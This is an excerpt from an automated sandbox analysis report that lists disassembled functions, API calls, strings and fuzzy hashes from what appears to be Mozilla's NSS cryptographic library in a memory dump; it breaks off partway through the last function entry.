Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
API String ID: 1003633598-3553622718
Opcode ID: e7bb931f9b4356c09efd39c2b8af564d6a2924177f5cbc88cec5bbada6506c2a
Instruction ID: f59eb13f13c76fc55927f1081b007e23a74c06f73c0d56342d509d698f3e0e2b
Opcode Fuzzy Hash: e7bb931f9b4356c09efd39c2b8af564d6a2924177f5cbc88cec5bbada6506c2a
Instruction Fuzzy Hash: 6F41F831601104AFDB208B94DF8DF6A7775EB4631DF048935E9085BB12DB36BC09D791

Function 6C7A7C90 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Verify), ref: 6C7A7CB6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A7CE4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A7CF3

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A7D09
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C7A7D2A
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C7A7D45
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C7A7D5E
PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6C7A7D77

Strings

hSession = 0x%x, xrefs: 6C7A7CCE, 6C7A7CDE
ulSignatureLen = %d, xrefs: 6C7A7D72
ulDataLen = %d, xrefs: 6C7A7D40
pData = 0x%p, xrefs: 6C7A7D25
C_Verify, xrefs: 6C7A7CB1
pSignature = 0x%p, xrefs: 6C7A7D59
(CK_INVALID_HANDLE), xrefs: 6C7A7CEC

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pSignature = 0x%p$ ulDataLen = %d$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_Verify
API String ID: 1003633598-3278097884
Opcode ID: 447d925c52da65b6e571c941e6c4ae55dd17f8aa53e369813fcdda1006a068ba
Instruction ID: 7af29f171228b029713f64d00c0fee955a2ea28f701063eb9daa5533f11ee468
Opcode Fuzzy Hash: 447d925c52da65b6e571c941e6c4ae55dd17f8aa53e369813fcdda1006a068ba
Instruction Fuzzy Hash: 9531C131602154ABDB308FA8DF4DE6A7BB1AB4631DF088475E80857B12DB34AC49CBE1

Function 6C7A2F00 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SetPIN), ref: 6C7A2F26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A2F54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A2F63

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A2F79
PR_LogPrint.NSS3( pOldPin = 0x%p,?), ref: 6C7A2F9A
PR_LogPrint.NSS3( ulOldLen = %d,?), ref: 6C7A2FB5
PR_LogPrint.NSS3( pNewPin = 0x%p,?), ref: 6C7A2FCE
PR_LogPrint.NSS3( ulNewLen = %d,?), ref: 6C7A2FE7

Strings

ulNewLen = %d, xrefs: 6C7A2FE2
hSession = 0x%x, xrefs: 6C7A2F3E, 6C7A2F4E
ulOldLen = %d, xrefs: 6C7A2FB0
pNewPin = 0x%p, xrefs: 6C7A2FC9
pOldPin = 0x%p, xrefs: 6C7A2F95
C_SetPIN, xrefs: 6C7A2F21
(CK_INVALID_HANDLE), xrefs: 6C7A2F5C

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pNewPin = 0x%p$ pOldPin = 0x%p$ ulNewLen = %d$ ulOldLen = %d$ (CK_INVALID_HANDLE)$C_SetPIN
API String ID: 1003633598-3716813897
Opcode ID: 47b768b44927e9d6c121cb5c0a6d552c5ba272305c98d09644894273daeff468
Instruction ID: 8d5afb632fc2df0e8a4309bbd4b11b99a74c521681291e652a9b0b1a17565622
Opcode Fuzzy Hash: 47b768b44927e9d6c121cb5c0a6d552c5ba272305c98d09644894273daeff468
Instruction Fuzzy Hash: C831D235602154ABCB209F99CF4CE5A77B1EB4A31DF048535E808A7B12DB34BC09CBD1

Function 6C83CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C83CC7B), ref: 6C83CD7A

Part of subcall function 6C83CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C7AC1A8,?), ref: 6C83CE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C83CDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C83CDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6C83CDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C83CD8E

Part of subcall function 6C7605C0: PR_EnterMonitor.NSS3 ref: 6C7605D1
Part of subcall function 6C7605C0: PR_ExitMonitor.NSS3 ref: 6C7605EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6C83CDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C83CDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C83CE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C83CE29
PR_UnloadLibrary.NSS3(00000000), ref: 6C83CE48

Strings

ws2_32.dll, xrefs: 6C83CD75
freeaddrinfo, xrefs: 6C83CD9F, 6C83CE10
wship6.dll, xrefs: 6C83CDE3
getnameinfo, xrefs: 6C83CDB2, 6C83CE23
getaddrinfo, xrefs: 6C83CD88, 6C83CDF9

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: e258a63189f96e4154e8f37dc9ed063072da3045cb337dc15e230a8b019999f7
Instruction ID: af849f89bd16e9b2b368414adff6a1678242f668c37f7a19fcd3f7a5c5c82179
Opcode Fuzzy Hash: e258a63189f96e4154e8f37dc9ed063072da3045cb337dc15e230a8b019999f7
Instruction Fuzzy Hash: D111A5E5E0213112DB3166FA7E089AA38585F0225DF146E39F81992F43FB15D905C7E6

Function 6C881C60 Relevance: 25.6, APIs: 17, Instructions: 114COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6C8813BC,?,?,?,6C881193), ref: 6C881C6B
PR_NewLock.NSS3(?,6C881193), ref: 6C881C7E

Part of subcall function 6C8398D0: calloc.MOZGLUE(00000001,00000084,6C760936,00000001,?,6C76102C), ref: 6C8398E5

PR_NewCondVar.NSS3(00000000,?,6C881193), ref: 6C881C91

Part of subcall function 6C75BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C7621BC), ref: 6C75BB8C

PR_NewCondVar.NSS3(00000000,?,?,6C881193), ref: 6C881CA7

Part of subcall function 6C75BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C75BBEB
Part of subcall function 6C75BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C75BBFB
Part of subcall function 6C75BB80: GetLastError.KERNEL32 ref: 6C75BC03
Part of subcall function 6C75BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C75BC19
Part of subcall function 6C75BB80: free.MOZGLUE(00000000), ref: 6C75BC22

PR_NewCondVar.NSS3(00000000,?,?,?,6C881193), ref: 6C881CBE
PR_NewCondVar.NSS3(00000000,?,?,?,?,6C881193), ref: 6C881CD4
calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6C881193), ref: 6C881CFE
PR_Lock.NSS3(?,?,?,?,?,?,?,6C881193), ref: 6C881D1A

Part of subcall function 6C839BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C761A48), ref: 6C839BB3
Part of subcall function 6C839BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C761A48), ref: 6C839BC8

PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6C881193), ref: 6C881D3D

Part of subcall function 6C81DD70: TlsGetValue.KERNEL32 ref: 6C81DD8C
Part of subcall function 6C81DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C81DDB4

PR_SetError.NSS3(FFFFE890,00000000,?,6C881193), ref: 6C881D4E
PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6C881193), ref: 6C881D64
PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6C881193), ref: 6C881D6F
PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6C881193), ref: 6C881D7B
PR_DestroyCondVar.NSS3(?,?,?,?,?,6C881193), ref: 6C881D87
PR_DestroyCondVar.NSS3(00000000,?,?,?,6C881193), ref: 6C881D93
PR_DestroyLock.NSS3(00000000,?,?,6C881193), ref: 6C881D9F
free.MOZGLUE(00000000,?,6C881193), ref: 6C881DA8

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
String ID:
API String ID: 3246495057-0
Opcode ID: 42ac2e6bd34280e47b578dc9d0e6648867dfeb0dc5f8ac2db477b0ccac92d72e
Instruction ID: 1d3e872a6f6a07fe6e0c4cd72393d6ed2e683a6725c2c2ff5c22d74643612435
Opcode Fuzzy Hash: 42ac2e6bd34280e47b578dc9d0e6648867dfeb0dc5f8ac2db477b0ccac92d72e
Instruction Fuzzy Hash: C731E4F1E013015BEB309F65AE45AA776E4AF0165DB040838E85A87F41FF31E918CBE2

Function 6C795E60 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 348COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C795ECF
EnterCriticalSection.KERNEL32(?), ref: 6C795EE3
PR_Unlock.NSS3(?), ref: 6C795F0A
PK11_MakeIDFromPubKey.NSS3(00000014), ref: 6C795FB5

Strings

NSS_USE_DECODED_CKA_EC_POINT, xrefs: 6C7961F4
S&{l, xrefs: 6C7962E3
S&{l, xrefs: 6C795E6C, 6C79627F, 6C795F12

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterFromK11_MakeSectionUnlockValue
String ID: NSS_USE_DECODED_CKA_EC_POINT$S&{l$S&{l
API String ID: 2280678669-2803774951
Opcode ID: 63bae53f447cfd19be3dccbd024145f6cecfa9bb783cbb49d9045b4363c11271
Instruction ID: 6306247a715617479eba999aea0d870c2ba423f3fc9edd3e3cc500bd09e24700
Opcode Fuzzy Hash: 63bae53f447cfd19be3dccbd024145f6cecfa9bb783cbb49d9045b4363c11271
Instruction Fuzzy Hash: 9CF105B5A002158FDB54CF18D984B86BBF4FF09308F5582AADC089B746D774EA84CF91

Function 6C7E0C60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(*,~l), ref: 6C7E0C81

Part of subcall function 6C7CBE30: SECOID_FindOID_Util.NSS3(6C78311B,00000000,?,6C78311B,?), ref: 6C7CBE44

Part of subcall function 6C7B8500: SECOID_GetAlgorithmTag_Util.NSS3(6C7B95DC,00000000,00000000,00000000,?,6C7B95DC,00000000,00000000,?,6C797F4A,00000000,?,00000000,00000000), ref: 6C7B8517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7E0CC4

Part of subcall function 6C7CFAB0: free.MOZGLUE(?,-00000001,?,?,6C76F673,00000000,00000000), ref: 6C7CFAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C7E0CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C7E0D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C7E0D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C7E0D7D
free.MOZGLUE(00000000), ref: 6C7E0DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7E0DC1
free.MOZGLUE(00000000), ref: 6C7E0DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7E0E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C7E0E0F

Part of subcall function 6C7B95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C797F4A,00000000,?,00000000,00000000), ref: 6C7B95E0
Part of subcall function 6C7B95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C797F4A,00000000,?,00000000,00000000), ref: 6C7B95F5
Part of subcall function 6C7B95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C7B9609
Part of subcall function 6C7B95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C7B961D
Part of subcall function 6C7B95C0: PK11_GetInternalSlot.NSS3 ref: 6C7B970B
Part of subcall function 6C7B95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C7B9756
Part of subcall function 6C7B95C0: PK11_GetIVLength.NSS3(?), ref: 6C7B9767
Part of subcall function 6C7B95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C7B977E
Part of subcall function 6C7B95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7B978E

Strings

-$~l, xrefs: 6C7E0C64
*,~l, xrefs: 6C7E0DCC
*,~l, xrefs: 6C7E0C69, 6C7E0DE0, 6C7E0C80, 6C7E0C8B, 6C7E0CAF

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID: *,~l$*,~l$-$~l
API String ID: 3136566230-3769478742
Opcode ID: ef63f6b7c8b5465c02eccb779cf08eecd39ef6f84c70c67d9531c1960827a40a
Instruction ID: c2355abc624eadbf6f39c9a0fa2ac4c72822aaeb98c48dc68dc1edb561a9b45a
Opcode Fuzzy Hash: ef63f6b7c8b5465c02eccb779cf08eecd39ef6f84c70c67d9531c1960827a40a
Instruction Fuzzy Hash: 5141B4B2900246ABEB00DF65DE4ABAF7678BF0530CF140134ED1567741EB35AA54DBE2

Function 6C7D5CA0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6C7D5EC0,00000000,?,?), ref: 6C7D5CBE
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6C7D5CD7
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C7D5CF0
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C7D5D09
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6C7D5EC0,00000000,?,?), ref: 6C7D5D1F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6C7D5D3C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D5D51
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D5D66
PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6C7D5D80

Strings

NSS_DEFAULT_DB_TYPE, xrefs: 6C7D5D1A
extern:, xrefs: 6C7D5CEA, 6C7D5D4B
dbm:, xrefs: 6C7D5D03, 6C7D5D60
sql:, xrefs: 6C7D5CD1, 6C7D5D36
multiaccess:, xrefs: 6C7D5CB8

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: strncmp$SecureStrdup_Util
String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
API String ID: 1171493939-3017051476
Opcode ID: 9b83f08b4ed52ad4d89b18c33fbed0ca327d11ddca501820c6f6caf5aafc85ef
Instruction ID: 93d17d1be60af48a9b4a059dc5f5aa9d94ce06666534a1b8339d90abb9ab0eb0
Opcode Fuzzy Hash: 9b83f08b4ed52ad4d89b18c33fbed0ca327d11ddca501820c6f6caf5aafc85ef
Instruction Fuzzy Hash: 4731E2E06413016BE7A01F24EE9EB663768EF0724CF260430ED55A6B82E671E501C2F9

Function 6C7D6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6C8A1DE0,?), ref: 6C7D6CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7D6D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C7D6D70
PORT_Alloc_Util.NSS3(00000480), ref: 6C7D6D82
DER_GetInteger_Util.NSS3(?), ref: 6C7D6DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7D6DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C7D6E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C7D6F19
PK11_DigestBegin.NSS3(00000000), ref: 6C7D6F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6C7D6F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C7D7011
PK11_FreeSymKey.NSS3(00000000), ref: 6C7D7033
free.MOZGLUE(?), ref: 6C7D703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C7D7060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C7D7087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6C7D70AF

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 31fa6d9fe253f51bad29fd5119871cfdc30181a1f97bd8e5c858ca383d5f17c5
Instruction ID: 1ee7d1d60f0f330d4a9b04a4e9f37032468354f59850673b84eb8cf076833c14
Opcode Fuzzy Hash: 31fa6d9fe253f51bad29fd5119871cfdc30181a1f97bd8e5c858ca383d5f17c5
Instruction Fuzzy Hash: 4AA119719042019BEB009F24DF49B5A32A4EB8130CF268D39E958DBB81F735FA49C793

Function 6C79AEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C77AB95,00000000,?,00000000,00000000,00000000), ref: 6C79AF25
EnterCriticalSection.KERNEL32(?,?,?,?,6C77AB95,00000000,?,00000000,00000000,00000000), ref: 6C79AF39
PR_Unlock.NSS3(?,?,?,6C77AB95,00000000,?,00000000,00000000,00000000), ref: 6C79AF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C77AB95,00000000,?,00000000,00000000,00000000), ref: 6C79AF69
TlsGetValue.KERNEL32 ref: 6C79B06B
EnterCriticalSection.KERNEL32(?), ref: 6C79B083
PR_Unlock.NSS3(?), ref: 6C79B0A4
TlsGetValue.KERNEL32 ref: 6C79B0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6C79B0D9
PR_Unlock.NSS3 ref: 6C79B102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C79B151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C79B182

Part of subcall function 6C7CFAB0: free.MOZGLUE(?,-00000001,?,?,6C76F673,00000000,00000000), ref: 6C7CFAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C79B177

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C77AB95,00000000,?,00000000,00000000,00000000), ref: 6C79B1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6C77AB95,00000000,?,00000000,00000000,00000000), ref: 6C79B1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C77AB95,00000000,?,00000000,00000000,00000000), ref: 6C79B1C2

Part of subcall function 6C7C1560: TlsGetValue.KERNEL32(00000000,?,6C790844,?), ref: 6C7C157A
Part of subcall function 6C7C1560: EnterCriticalSection.KERNEL32(?,?,?,6C790844,?), ref: 6C7C158F
Part of subcall function 6C7C1560: PR_Unlock.NSS3(?,?,?,?,6C790844,?), ref: 6C7C15B2

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: 8bf9f46cf99945868471606e270b3777f8cb5ef9ca3bbefbe9a8fb5a489b0e58
Instruction ID: 852677da9026b2a56527c403fcd75b1a3831c76fee9ff4b250ee04c487d8560f
Opcode Fuzzy Hash: 8bf9f46cf99945868471606e270b3777f8cb5ef9ca3bbefbe9a8fb5a489b0e58
Instruction Fuzzy Hash: 1BA1C1B1E002069BEF109F64ED49BAAB7B4FF05308F104134E905A7B52E731E955CBE1

Function 6C792C40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(#?yl,?,6C78E477,?,?,?,00000001,00000000,?,?,6C793F23,?), ref: 6C792C62
